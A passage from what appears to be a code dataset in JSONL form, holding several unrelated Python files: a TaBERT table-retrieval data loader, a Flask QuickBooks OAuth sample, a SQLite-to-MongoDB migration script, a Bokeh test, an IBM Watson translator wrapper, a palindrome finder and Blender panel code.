table_tokenizer, min_row):\n table_reps = []\n\n for i in range(0, len(data), min_row):\n rows = data[i:i+min_row]\n table_rep = Table(id=f'{tid}_{i}',\n header=[Column(h.strip(), infer_column_type(h)) for h in heading],\n data=rows\n ).tokenize(table_tokenizer)\n table_reps.append(table_rep)\n\n # if len(data) <= min_row: # 테이블이 최소행 보다 작은 경우\n # column_rep = Table(id=title,\n # header=[Column(h.strip(), infer_column_type(h)) for h in heading],\n # data=data\n # ).tokenize(table_tokenizer)\n # table_rep_list.append(column_rep)\n # else:\n # row_n = max(min_row, ceil(len(data) / max_table))\n # slice_row_data = [data[i * row_n:(i + 1) * row_n] for i in range((len(data) + row_n - 1) // row_n)]\n # for rows in slice_row_data:\n # column_rep = Table(id=title,\n # header=[Column(h.strip(), infer_column_type(h)) for h in heading],\n # data=rows\n # ).tokenize(table_tokenizer)\n # table_rep_list.append(column_rep)\n\n # if len(data) <= min_row: # 테이블이 최소행 보다 작은 경우\n # column_rep = Table(id=title,\n # header=[Column(h.strip(), infer_column_type(h)) for h in heading],\n # data=data\n # ).tokenize(table_tokenizer)\n # table_rep_list.append(column_rep)\n # else:\n # row_n = max(min_row, ceil(len(data) / max_table))\n # slice_row_data = [data[i * row_n:(i + 1) * row_n] for i in range((len(data) + row_n - 1) // row_n)]\n # for rows in slice_row_data:\n # column_rep = Table(id=title,\n # header=[Column(h.strip(), infer_column_type(h)) for h in heading],\n # data=rows\n # ).tokenize(table_tokenizer)\n # table_rep_list.append(column_rep)\n\n # row_n = max(min_row, ceil(len(data) / max_table_nums))\n # slice_row_data = [data[i * row_n:(i + 1) * row_n] for i in range((len(data) + row_n - 1) // row_n)]\n # if rel == 0: # Negative\n # for rows in slice_row_data:\n # column_rep = Table(id=title,\n # header=[Column(h.strip(), infer_column_type(h)) for h in heading],\n # data=rows\n # ).tokenize(table_tokenizer)\n # table_rep_list.append((rel, column_rep))\n\n # else: # Positive\n # query_tokens = [token.strip() for token in query.split(' ')]\n # is_always_postive = False\n # for token in query_tokens:\n # if token in caption:\n # is_always_postive = True\n # break\n\n # if is_always_postive: # caption에 포함되어있는 경우\n # for rows in slice_row_data:\n # column_rep = Table(id=title,\n # header=[Column(h.strip(), 'text') for h in heading],\n # data=rows\n # ).tokenize(table_tokenizer)\n # table_rep_list.append((rel, column_rep))\n # else:\n # for rows in slice_row_data:\n # column_rep = Table(id=title,\n # header=[Column(h.strip(), 'text') for h in heading],\n # data=rows\n # ).tokenize(table_tokenizer)\n # modify_rel = '0'\n # # Row data를 하나의 string으로\n # cell_string_sum = ''\n # for row in rows:\n # cell_string_sum += ' '.join(row)\n # # Query tokens과 overlap\n # for token in query_tokens:\n # if token in cell_string_sum:\n # modify_rel = '1'\n # break\n # table_rep_list.append((modify_rel, column_rep))\n\n return table_reps\n\n\nclass QueryTableDataset(Dataset):\n def __init__(self, data_dir: str = '.data', data_type: str = 'train',\n query_tokenizer=None, table_tokenizer=None, max_query_length=7,\n min_row=30, prepare=False, is_slice=True):\n self.data_dir = data_dir\n self.ids_file = f'{data_type}_{min_row}.pair'\n self.data_type = data_type\n self.is_slice = is_slice\n if prepare:\n self.prepare(data_dir, data_type, query_tokenizer, table_tokenizer, max_query_length, min_row=min_row)\n\n self.data = torch.load(os.path.join(self.processed_folder, self.ids_file))\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n return self.data[index]\n\n def prepare(self, data_dir, data_type, query_tokenizer, table_tokenizer, max_query_length, min_row):\n if self._check_exists():\n return\n\n processed_dir = Path(self.processed_folder)\n processed_dir.mkdir(exist_ok=True)\n if not (query_tokenizer and table_tokenizer):\n raise RuntimeError('Tokenizers are not found.' +\n ' You must set query_tokenizer and table_tokenizer')\n print('Processing...')\n\n query_dict = defaultdict()\n data = []\n path = Path(data_dir + '/' + data_type + '.jsonl')\n\n with open(path) as f:\n for line in f.readlines():\n if not line.strip():\n break\n\n # 테이블 기본 Meta data 파싱\n jsonStr = json.loads(line)\n tableId = jsonStr['docid'] # tableId -> tid\n query = jsonStr['query']\n qid = jsonStr['qid']\n rel = jsonStr['rel']\n\n if qid not in query_dict:\n query_tokenized = query_tokenizer.encode_plus(query,\n max_length=max_query_length,\n padding='max_length',\n truncation=True,\n return_tensors=\"pt\"\n )\n query_dict[qid] = query_tokenized\n\n table_reps, caption_rep = encode_tables(jsonStr, self.is_slice, query, table_tokenizer, min_row)\n # (Q, Pos_Table, Neg_Table)\n rel = 1 if rel > 0 else 0\n data.append((query_dict[qid], table_reps, [caption_rep] * len(table_reps), rel))\n\n\n # Save\n with open(os.path.join(processed_dir, self.ids_file), 'wb') as f:\n torch.save(data, f)\n print('Done!')\n\n @property\n def processed_folder(self):\n return os.path.join(self.data_dir, 'processed')\n\n def _check_exists(self):\n return os.path.exists(os.path.join(self.processed_folder, self.ids_file))\n\n\ndef query_table_collate_fn(batch):\n query, tables, caption, rel = zip(*batch)\n input_ids, token_type_ids, attention_mask = [], [], []\n for q in query:\n input_ids.append(q[\"input_ids\"].squeeze())\n token_type_ids.append(q[\"token_type_ids\"].squeeze())\n attention_mask.append(q[\"attention_mask\"].squeeze())\n\n query = {\"input_ids\": torch.stack(input_ids),\n \"token_type_ids\": torch.stack(token_type_ids),\n \"attention_mask\": torch.stack(attention_mask)}\n\n return query, tables, caption, torch.Tensor(rel)\n\n\ndef infer_column_type(value):\n if not value:\n return ''\n elif value.replace('.','').replace(',','').replace('-','').isdigit():\n return 'real'\n return 'text'\n\n\nclass TableDataset(Dataset):\n def __init__(self, data_dir: str = '.data', data_type: str = 'test', table_tokenizer=None, \n min_row=10, prepare=False, is_slice=True):\n self.data_dir = data_dir\n self.table_file = f'{data_type}_{min_row}.table'\n self.is_slice = is_slice\n\n if prepare:\n self.prepare(data_type, table_tokenizer, min_row)\n\n self.tables = torch.load(os.path.join(self.processed_folder, self.table_file))\n\n def __len__(self):\n return len(self.tables)\n\n def __getitem__(self, index):\n return self.tables[index]\n\n def prepare(self, data_type, table_tokenizer, min_row):\n if self._check_exists():\n return\n\n processed_dir = Path(self.processed_folder)\n processed_dir.mkdir(exist_ok=True)\n if not table_tokenizer:\n raise RuntimeError('Tokenizers are not found.' +\n ' You must set table_tokenizer')\n # print('Processing...')\n\n tables = []\n path = Path(self.data_dir + '/' + data_type + '.jsonl')\n\n with open(path) as f:\n for line in f.readlines():\n if not line.strip():\n break\n\n # 테이블 기본 Meta data 파싱\n jsonStr = json.loads(line)\n tableId = jsonStr['docid'] # tableId -> tid\n query = jsonStr['query']\n qid = jsonStr['qid']\n rel = jsonStr['rel']\n\n # Table Encode\n table_reps, caption_rep = encode_tables(jsonStr, self.is_slice, query, table_tokenizer, min_row)\n tables.append((f\"{tableId}\", table_reps, [caption_rep] * len(table_reps)))\n\n # Save\n with open(os.path.join(processed_dir, self.table_file), 'wb') as f:\n torch.save(tables, f)\n\n @property\n def processed_folder(self):\n return os.path.join(self.data_dir, 'processed')\n\n def _check_exists(self):\n return os.path.exists(os.path.join(self.processed_folder, self.table_file))\n\n\ndef table_collate_fn(batch):\n tid, tables, caption = zip(*batch)\n return tid, tables, caption\n\n\nclass QueryDataset(Dataset):\n def __init__(self, data_dir: str = '.data', data_type: str = 'test', query_tokenizer=None, \n max_query_length=7, prepare=False):\n self.data_dir = data_dir\n self.query_file = data_type + '.query'\n\n if prepare:\n self.prepare(data_type, query_tokenizer, max_query_length)\n\n self.queries = torch.load(os.path.join(self.processed_folder, self.query_file))\n\n def __len__(self):\n return len(self.queries)\n\n def __getitem__(self, index):\n return self.queries[index]\n\n def prepare(self, data_type, query_tokenizer, max_query_length):\n if self._check_exists():\n return\n\n processed_dir = Path(self.processed_folder)\n processed_dir.mkdir(exist_ok=True)\n if not query_tokenizer:\n raise RuntimeError('Tokenizers are not found.' +\n ' You must set query_tokenizer')\n print('Processing...')\n query_dict = dict()\n path = Path(self.data_dir + '/' + data_type + '.jsonl')\n\n with open(path) as f:\n for line in f.readlines():\n if not line.strip():\n break\n\n # 테이블 기본 Meta data 파싱\n jsonStr = json.loads(line)\n query = jsonStr['query']\n qid = jsonStr['qid']\n\n if qid not in query_dict:\n query_tokenized = query_tokenizer.encode_plus(query,\n max_length=max_query_length,\n padding='max_length',\n truncation=True,\n return_tensors=\"pt\"\n )\n query_dict[qid] = query_tokenized # BERT **input input_ids, seg_ids, mas_ids\n\n queries = list(query_dict.items())\n # Save\n with open(os.path.join(processed_dir, self.query_file), 'wb') as f:\n torch.save(queries, f)\n print('Done!')\n\n @property\n def processed_folder(self):\n return os.path.join(self.data_dir, 'processed')\n\n def _check_exists(self):\n return os.path.exists(os.path.join(self.processed_folder, self.query_file))\n\n\ndef query_collate_fn(batch):\n qid, query = zip(*batch)\n\n input_ids, token_type_ids, attention_mask = [], [], []\n for q in query:\n input_ids.append(q[\"input_ids\"].squeeze())\n token_type_ids.append(q[\"token_type_ids\"].squeeze())\n attention_mask.append(q[\"attention_mask\"].squeeze())\n\n query = {\"input_ids\": torch.stack(input_ids),\n \"token_type_ids\": torch.stack(token_type_ids),\n \"attention_mask\": torch.stack(attention_mask)}\n\n return qid, query \n\n\nif __name__ == \"__main__\":\n table_model = TableBertModel.from_pretrained('model/tabert_base_k3/model.bin')\n query_tokenizer = table_model.tokenizer\n table_tokenizer = table_model.tokenizer\n\n dataset = QueryTableDataset(data_dir='data/1',\n data_type='train',\n query_tokenizer=query_tokenizer,\n table_tokenizer=table_tokenizer,\n prepare=True,\n )\n dataloader = DataLoader(dataset,\n batch_size=2,\n collate_fn=query_table_collate_fn)\n\n for _ in range(1):\n for d in dataloader:\n print(d)\n break\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":18213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"626486768","text":"# This sample uses code from https://pythonhosted.org/Flask-OAuth/ for OAuth1 login with Twitter\nfrom flask import Flask, request, redirect, url_for, session, g, flash, \\\n render_template\nfrom flask_oauth import OAuth\nfrom qb import create_customer, add_customer\nimport json\nfrom utils import excel \nfrom utils import configRead\n\n# configuration\nSECRET_KEY = 'prod key'\nDEBUG = True\nfont_color = 'black'\nconsumer_tokens = configRead.get_consumer_tokens()\noauth_url = configRead.get_oauth_urls()\n\n# setup flask\napp = Flask(__name__)\napp.debug = DEBUG\napp.secret_key = SECRET_KEY\noauth = OAuth()\n\nqbo = oauth.remote_app('qbo',\n base_url=oauth_url['base_url'],\n request_token_url=oauth_url['request_token_url'],\n access_token_url=oauth_url['access_token_url'],\n authorize_url=oauth_url['authorize_url'],\n consumer_key=consumer_tokens['consumer_key'],\n consumer_secret=consumer_tokens['consumer_sec']\n)\n \n@qbo.tokengetter\ndef get_qbo_token(token=None):\n if session.has_key('qbo_token'):\n del session['qbo_token'] \n return session.get('qbo_token')\n \n@app.route('/')\ndef index():\n access_token = session.get('access_token')\n if access_token is None:\n return redirect(url_for('login'))\n \n access_token = access_token[0]\n global customer_list\n customer_list = excel.load_excel()\n \n return render_template('index.html', \n customer_dict=customer_list,\n title=\"QB Customer Leads\",\n text_color=font_color)\n\n#test based\n@app.route('/', methods=['GET','POST'])\ndef update_table():\n customer_id = request.form['id']\n for customer in customer_list:\n if customer['Id'] == customer_id:\n\n # Create customer object, add customer to qbo and get response\n access_tokens = session.get('qbo_token')\n realm_id = session.get('realm_id')\n customer_obj = create_customer(customer)\n \n req_status_content = add_customer(customer_obj, realm_id, access_tokens[0], access_tokens[1])\n status_code = req_status_content['status_code']\n content = json.loads(req_status_content['content'])\n\n global message\n global font_color\n # If customer added successfully, remove them from html and excel file\n if (status_code == 200):\n font_color = 'green'\n new_customer_list = excel.remove_lead(customer_list, customer_id)\n message = \"Success! Customer added to QBO\"\n flash(message)\n\n return render_template('index.html',\n customer_dict=new_customer_list,\n title=\"QB Customer Leads\",\n text_color=font_color)\n \n #If customer not found, show error message\n else:\n font_color = 'red'\n try:\n message = content['Fault']['Error'][0]['Message']\n except:\n message = \"Some error occurred. Error message not found.\"\n \n flash(message)\n return redirect(url_for('index'))\n \n@app.route('/login')\ndef login():\n return qbo.authorize(callback=url_for('oauth_authorized',\n next=request.args.get('next') or request.referrer or None))\n \n@app.route('/reset_session')\ndef reset_session():\n session.pop('qbo_token', None)\n session['is_authorized'] = False\n return redirect(request.referrer or url_for('index'))\n \n@app.route('/oauth-authorized')\n@qbo.authorized_handler\ndef oauth_authorized(resp):\n realm_id = str(request.args.get('realmId'))\n next_url = request.args.get('next') or url_for('index')\n if resp is None:\n flash(u'You denied the request to sign in.')\n return redirect(next_url)\n \n access_token = resp['oauth_token']\n session['access_token'] = access_token\n session['is_authorized'] = True\n session['realm_id'] = realm_id\n session['qbo_token'] = (\n resp['oauth_token'],\n resp['oauth_token_secret']\n )\n return redirect(url_for('index'))\n \nif __name__ == '__main__':\n app.run()","sub_path":"SampleApp/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"127564146","text":"\"\"\"\nInserting RPG data into mongoDB.\nQUESTION: \"How was working with MongoDB different from working with PostgreSQL? What was easier, and what was harder?\"\nANSWER: It's easier to input data with MongoDB, at least using Python. Since MongoDB takes dictionaries,\nPython's inbuilt capabilities make it relatively straightforward to convert sqlite data.\nHowever, PostgreSQL requires SQL queries, which are kind of a pain to do in Python.\nOn the other hand, retrieving/sorting/manipulating the data is easier in Postgre IMO.\nI find the relevant SQL commands more intuitive/powerful than the respective Mongo commands.\n\"\"\"\n\nimport sqlite3\nimport pymongo\nfrom password_example import password\n# Note: For the above to work, you'll have to change the\n# password in password_example to whatever your\n# mongoDB cluster's password is.\n\nclient = pymongo.MongoClient(f\"mongodb://admin:{password}@cluster0-shard-00-00-bxlcw.mongodb.net:27017,cluster0-shard-00-01-bxlcw.mongodb.net:27017,cluster0-shard-00-02-bxlcw.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true&w=majority\")\ndb = client.rpg_data\n\nconn = sqlite3.connect('rpg_db.sqlite3')\ncurs = conn.cursor()\n\n# My plan is to run a for-loop eventually, but I'll practice on a single table.\n\nquery = 'SELECT * FROM charactercreator_character;'\nrows = curs.execute(query).fetchall()\n\nfor row in rows:\n mongo_entry = {\n 'character_id': row[0],\n 'name': row[1],\n 'level': row[2],\n 'exp': row[3],\n 'hp': row[4],\n 'strength': row[5],\n 'intelligence': row[6],\n 'dexterity': row[7],\n 'wisdom': row[8]\n }\n db.charactercreator_character.insert_one(mongo_entry)\n\n# Confirm that this worked.\nprint(db.charactercreator_character.find_one())\n\n# Now we can run a for-loop. First, we need a list of all our tables.\ntables = ['charactercreator_mage', 'charactercreator_necromancer',\n 'charactercreator_thief', 'charactercreator_cleric',\n 'charactercreator_fighter', 'armory_item', 'armory_weapon',\n 'charactercreator_character_inventory']\n\n# Next is the loop. We'll be iterating on each table individually.\nfor table in tables:\n # First we need to know the column names.\n # We can do this through a \"PRAGMA table_info\" query.\n info_query = f'PRAGMA table_info({table});'\n table_info = curs.execute(info_query).fetchall()\n\n # The above gives us a list of tuples. The *second* entry\n # in each tuple is the column name we want.\n column_names = []\n for tup in table_info:\n column_names.append(tup[1])\n\n # Now we can do the main loop. First, get all the rows.\n row_query = f'SELECT * FROM {table};'\n table_rows = curs.execute(row_query).fetchall()\n for row in rows:\n mongo_entry = {}\n # The *keys* for the above dictionary are the column names,\n # and the *values* are the row entries.\n for i in range(len(column_names)):\n # We need to set up the loop this way so that each key\n # gets mapped to the proper value.\n key = column_names[i]\n value = row[i]\n mongo_entry[key] = value\n \n # And now we can finally insert the row!\n db[table].insert_one(mongo_entry)\n # Note that you have to use the bracket syntax here (db[table])\n # rather than dot syntax (db.table), since the latter would\n # create a single collection named \"table.\" The bracket syntax\n # creates a different collection for each table, with the same\n # name as the table's name.\n","sub_path":"module3-nosql-and-document-oriented-databases/insert_rpg_data.py","file_name":"insert_rpg_data.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"155977456","text":"from __future__ import absolute_import, print_function\n\nimport unittest\nimport sys\n\nclass TestContents(unittest.TestCase):\n\n def test_dir(self):\n import bokeh\n names = dir(bokeh)\n self.assertTrue(\"__version__\" in names)\n self.assertTrue(\"__base_version__\" in names)\n self.assertTrue(\"license\" in names)\n self.assertTrue(\"test\" in names)\n self.assertTrue(\"sampledata\" in names)\n\n def test_version_defined(self):\n import bokeh\n self.assertTrue(bokeh.__version__ != 'unknown')\n\n def test_license(self):\n import bokeh\n try:\n bokeh.license()\n except Exception as e:\n print(\"If LICENSE.txt does not exist in bokeh/ subdir, one way to fix this may be to run 'python setup.py develop'\", file=sys.stderr)\n raise e\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"lib/python2.7/site-packages/bokeh/tests/test_bokeh_init.py","file_name":"test_bokeh_init.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"513323321","text":"\"\"\"Translator using ibm watson language translator service \"\"\"\n\nimport json\nimport os\nfrom ibm_watson import LanguageTranslatorV3\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napikey = os.environ['apikey']\nurl = os.environ['url']\n\nauthenticator = IAMAuthenticator(apikey)\nlanguage_translator = LanguageTranslatorV3(\n version='2021-01-01',\n authenticator=authenticator\n)\n\nlanguage_translator.set_service_url(url)\n\ndef english_to_french(english_text):\n \"\"\"Function that translates english text to text \"\"\"\n if english_text is not None:\n french_text = language_translator.translate(\n text=english_text,\n model_id='en-fr').get_result()\n print(french_text['translations'][0]['translation'])\n return french_text['translations'][0]['translation']\n \ndef french_to_english(french_text):\n \"\"\"Function that translates french text to english \"\"\"\n if french_text is not None:\n english_text = language_translator.translate(\n text=french_text,\n model_id='fr-en').get_result()\n print(english_text['translations'][0]['translation'])\n return english_text['translations'][0]['translation']\n ","sub_path":"final_project/machinetranslation/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"407765657","text":"\ndef search_palindromes(string):\n # string expansion for handling 'out of index error'\n # when first/last letter is also a part of palindrome and loop searches for previous/next element\n string = \"~\" + string + \"~\"\n pali_list = []\n\n for i in range(1,len(string)-2):\n if string[i] == string[i+1]:\n j = 1\n while string[i-j] == string[i+j+1]:\n pali_list.append(string[i-j:i+j+2])\n j += 1\n else:\n j = 1\n while string[i-j] == string[i+j]:\n pali_list.append(string[i-j:i+j+1])\n j += 1\n return pali_list\n\n\n\nprint(search_palindromes('goddog goat dad duck doooodle neveroomoor'))","sub_path":"week-03/friday/project_part2.py","file_name":"project_part2.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"376109129","text":"# Copyright (C) 2009-2019, Panagiotis Christopoulos Charitos and contributors.\n# All rights reserved.\n# Code licensed under the BSD License.\n# http://www.anki3d.org/LICENSE\n# keep methods in alphabetical order\n\n\nimport bpy, os\nfrom bpy import context\nfrom bpy.app.translations import contexts as i18n_contexts\n# from ..libs import material_utilities\n# from ..libs import mesh_utilities\n# from ..libs import gui_utilities\n\n############################### CONSTANTS ###############################\n# MAT = material_utilities.MaterialUtilities()\n# GUI = gui_utilities.GuiUtilities()\n# MESH = mesh_utilities.MeshUtilities()\n# ico_path = \"%s/../libs/ico\" % os.path.dirname(os.path.realpath(__file__))\n# ico = gui_utilities.get_icons(ico_path)\n############################### CONSTANTS ###############################\n\ndef bsi_empty_panel(layout, context):\n\tpass\n\ndef VIEW3D_PP_meshproperties(layout, context):\n\tuse_freestyle = bpy.app.build_options.freestyle\n\tmesh = context.active_object.data\n\tscene = context.scene\n\n\tif (context.active_object and (context.mode == 'EDIT_MESH')):\n\t\tbox = layout.box()\n\t\tsplit = box.split()\n\t\tcol = split.column()\n\t\tcol.label(text=\"Overlays:\")\n\t\tcol.prop(mesh, \"show_faces\", text=\"Faces\")\n\t\tcol.prop(mesh, \"show_edges\", text=\"Edges\")\n\t\tcol.prop(mesh, \"show_edge_crease\", text=\"Creases\")\n\t\tif use_freestyle:\n\t\t\tcol.prop(mesh, \"show_edge_seams\", text=\"Seams\")\n\n\t\tbox.prop(mesh, \"show_weight\")\n\n\t\tcol = split.column()\n\t\tcol.label()\n\t\tif not use_freestyle:\n\t\t\tcol.prop(mesh, \"show_edge_seams\", text=\"Seams\")\n\t\tcol.prop(mesh, \"show_edge_sharp\", text=\"Sharp\", text_ctxt=i18n_contexts.plural)\n\t\tcol.prop(mesh, \"show_edge_bevel_weight\", text=\"Bevel\")\n\t\tif use_freestyle:\n\t\t\tcol.prop(mesh, \"show_freestyle_edge_marks\", text=\"Edge Marks\")\n\t\t\tcol.prop(mesh, \"show_freestyle_face_marks\", text=\"Face Marks\")\n\n\t\tbox = layout.box()\n\n\t\tbox.label(text=\"Normals:\")\n\t\trow = box.row(align=True)\n\n\t\trow.prop(mesh, \"show_normal_vertex\", text=\"\", icon='VERTEXSEL')\n\t\trow.prop(mesh, \"show_normal_loop\", text=\"\", icon='LOOPSEL')\n\t\trow.prop(mesh, \"show_normal_face\", text=\"\", icon='FACESEL')\n\n\t\tsub = row.row(align=True)\n\t\tsub.active = mesh.show_normal_vertex or mesh.show_normal_face or mesh.show_normal_loop\n\t\tsub.prop(scene.tool_settings, \"normal_size\", text=\"Size\")\n\n\t\tbox = layout.box()\n\t\tsplit = box.split()\n\t\tcol = split.column()\n\t\tcol.label(text=\"Edge Info:\")\n\t\tcol.prop(mesh, \"show_extra_edge_length\", text=\"Length\")\n\t\tcol.prop(mesh, \"show_extra_edge_angle\", text=\"Angle\")\n\t\tcol = split.column()\n\t\tcol.label(text=\"Face Info:\")\n\t\tcol.prop(mesh, \"show_extra_face_area\", text=\"Area\")\n\t\tcol.prop(mesh, \"show_extra_face_angle\", text=\"Angle\")\n\t\tif bpy.app.debug:\n\t\t\tlayout.prop(mesh, \"show_extra_indices\")\n\n\t\tstatvis = context.tool_settings.statvis\n\t\tbox = layout.box()\n\t\tbox.prop(mesh, \"show_statvis\", text=\"Mesh Analysis\")\n\t\tif mesh.show_statvis:\n\t\t\tbox.prop(statvis, \"type\")\n\t\t\tif statvis.type == 'OVERHANG':\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trow.prop(statvis, \"overhang_min\", text=\"\")\n\t\t\t\trow.prop(statvis, \"overhang_max\", text=\"\")\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trow.prop(statvis, \"overhang_axis\", expand=True)\n\t\t\telif statvis.type == 'THICKNESS':\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trow.prop(statvis, \"thickness_min\", text=\"\")\n\t\t\t\trow.prop(statvis, \"thickness_max\", text=\"\")\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trowt.prop(statvis, \"thickness_samples\")\n\t\t\telif statvis_type == 'INTERSECT':\n\t\t\t\tpass\n\t\t\telif statvis.type == 'DISTORT':\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trow.prop(statvis, \"distort_min\", text=\"\")\n\t\t\t\trow.prop(statvis, \"distort_max\", text=\"\")\n\t\t\telif statvis.type == 'SHARP':\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trow.prop(statvis, \"sharp_min\", text=\"\")\n\t\t\t\trow.prop(statvis, \"sharp_max\", text=\"\")\n\n\ndef VIEW3D_PP_viewproperties(layout, context):\n\tv3d = GUI.get_screen_area(type = \"VIEW_3D\")\n\tcol = layout.column()\n\tcol.active = bool(v3d.region_3d.view_perspective != 'CAMERA' or v3d.region_quadviews)\n\tcol.prop(v3d, \"lens\")\n\tcol.label(text=\"Lock to Object:\")\n\tcol.prop(v3d, \"lock_object\", text=\"\")\n\tlock_object = v3d.lock_object\n\tif lock_object:\n\t\tif lock_object.type == 'ARMATURE':\n\t\t\tcol.prop_search(v3d, \"lock_bone\", lock_object.data,\n\t\t\t\t\t\t\t\"edit_bones\" if lock_object.mode == 'EDIT'\n\t\t\t\t\t\t\telse \"bones\",\n\t\t\t\t\t\t\ttext=\"\")\n\telse:\n\t\tcol.prop(v3d, \"lock_cursor\", text=\"Lock to Cursor\")\n\n\tcol = layout.column()\n\tcol.prop(v3d, \"lock_camera\")\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Clip:\")\n\tcol.prop(v3d, \"clip_start\", text=\"Start\")\n\tcol.prop(v3d, \"clip_end\", text=\"End\")\n\n\tsubcol = col.column(align=True)\n\tsubcol.enabled = not v3d.lock_camera_and_layers\n\tsubcol.label(text=\"Local Camera:\")\n\tsubcol.prop(v3d, \"camera\", text=\"\")\n\n\tcol = layout.column(align=True)\n\tcol.prop(view, \"use_render_border\")\n\tcol.active = v3d.region_3d.view_perspective != 'CAMERA'\n\n\ndef VIEW3D_TP_addobject(layout, context):\n\tcol = layout.column(align=True)\n\n\tcol.label(text=\"Primitives:\")\n\trow = col.row(align=True)\n\trow.operator(\"mesh.primitive_plane_add\", text=\" \", icon='MESH_PLANE')\n\trow.operator(\"mesh.primitive_cube_add\", text=\" \", icon='MESH_CUBE')\n\trow.operator(\"mesh.primitive_circle_add\", text=\" \", icon='MESH_CIRCLE')\n\trow.operator(\"mesh.primitive_uv_sphere_add\", text=\" \", icon='MESH_UVSPHERE')\n\trow.operator(\"mesh.primitive_ico_sphere_add\", text=\" \", icon='MESH_ICOSPHERE')\n\trow = col.row(align=True)\n\trow.operator(\"mesh.primitive_cylinder_add\", text=\" \", icon='MESH_CYLINDER')\n\trow.operator(\"mesh.primitive_cone_add\", text=\" \", icon='MESH_CONE')\n\trow.operator(\"mesh.primitive_torus_add\", text=\" \", icon='MESH_TORUS')\n\trow.operator(\"mesh.primitive_grid_add\", text=\" \", icon='MESH_GRID')\n\trow.operator(\"mesh.primitive_monkey_add\", text=\" \", icon='MESH_MONKEY')\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Misc:\")\n\trow = col.row(align=True)\n\trow.operator(\"object.text_add\", text=\" \", icon='OUTLINER_OB_FONT')\n\trow.operator(\"object.armature_add\", text=\" \", icon='OUTLINER_OB_ARMATURE')\n\trow.operator(\"object.add\", text=\" \", icon='OUTLINER_OB_LATTICE').type = 'LATTICE'\n\trow = col.row(align=True)\n\trow.operator(\"object.empty_add\", text=\" \", icon='OUTLINER_OB_EMPTY').type = 'PLAIN_AXES'\n\trow.operator(\"object.speaker_add\", text=\" \", icon='OUTLINER_OB_SPEAKER')\n\trow.operator(\"object.camera_add\", text=\" \", icon='OUTLINER_OB_CAMERA')\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Bezier:\")\n\trow = col.row(align=True)\n\trow.operator(\"curve.primitive_bezier_curve_add\", text=\"Bezier\", icon='CURVE_BEZCURVE')\n\trow.operator(\"curve.primitive_bezier_circle_add\", text=\"Circle\", icon='CURVE_BEZCIRCLE')\n\n\n\tcol.label(text=\"Nurbs and Surfaces:\")\n\trow = col.row(align=True)\n\trow.operator(\"curve.primitive_nurbs_curve_add\", text=\" \", icon='CURVE_NCURVE')\n\trow.operator(\"curve.primitive_nurbs_circle_add\", text=\" \", icon='CURVE_NCIRCLE')\n\trow.operator(\"curve.primitive_nurbs_path_add\", text=\" \", icon='CURVE_PATH')\n\n\t#col = layout.column(align=True)\n\t#col.label(text=\"Surface: \")\n\trow = col.row(align=True)\n\trow.operator(\"surface.primitive_nurbs_surface_curve_add\", text=\" \", icon='SURFACE_NCURVE')\n\trow.operator(\"surface.primitive_nurbs_surface_circle_add\", text=\" \", icon='SURFACE_NCIRCLE')\n\trow.operator(\"surface.primitive_nurbs_surface_surface_add\", text=\" \", icon='SURFACE_NSURFACE')\n\trow = col.row(align=True)\n\trow.operator(\"surface.primitive_nurbs_surface_cylinder_add\", text=\" \", icon='SURFACE_NCYLINDER')\n\trow.operator(\"surface.primitive_nurbs_surface_sphere_add\", text=\" \", icon='SURFACE_NSPHERE')\n\trow.operator(\"surface.primitive_nurbs_surface_torus_add\", text=\" \", icon='SURFACE_NTORUS')\n\n\tcol = layout.column(align=True)\n\trow = col.row(align=True)\n\t# row.operator_enum(\"object.metaball_add\",\"type\")\n\trow.operator_menu_enum(\"object.metaball_add\", \"type\",\n\t\t\t\t\t\t\ttext=\"Metaball\",\n\t\t\t\t\t\t\ticon='OUTLINER_OB_META'\n\t\t\t\t\t\t\t)\n\trow.operator_menu_enum(\"object.lamp_add\", \"type\",\n\t\t\t\t\t\t\ttext=\"Lamp\",\n\t\t\t\t\t\t\ticon='OUTLINER_OB_LAMP'\n\t\t\t\t\t\t\t)\n\ndef VIEW3D_TP_rigidbody(layout, context):\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Add/Remove:\")\n\trow = col.row(align=True)\n\trow.operator(\"rigidbody.objects_add\", text=\"Add Active\").type = 'ACTIVE'\n\trow.operator(\"rigidbody.objects_add\", text=\"Add Passive\").type = 'PASSIVE'\n\trow = col.row(align=True)\n\trow.operator(\"rigidbody.objects_remove\", text=\"Remove\")\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Object Tools:\")\n\tcol.operator(\"rigidbody.shape_change\", text=\"Change Shape\")\n\tcol.operator(\"rigidbody.mass_calculate\", text=\"Calculate Mass\")\n\tcol.operator(\"rigidbody.object_settings_copy\", text=\"Copy from Active\")\n\tcol.operator(\"object.visual_transform_apply\", text=\"Apply Transformation\")\n\tcol.operator(\"rigidbody.bake_to_keyframes\", text=\"Bake To 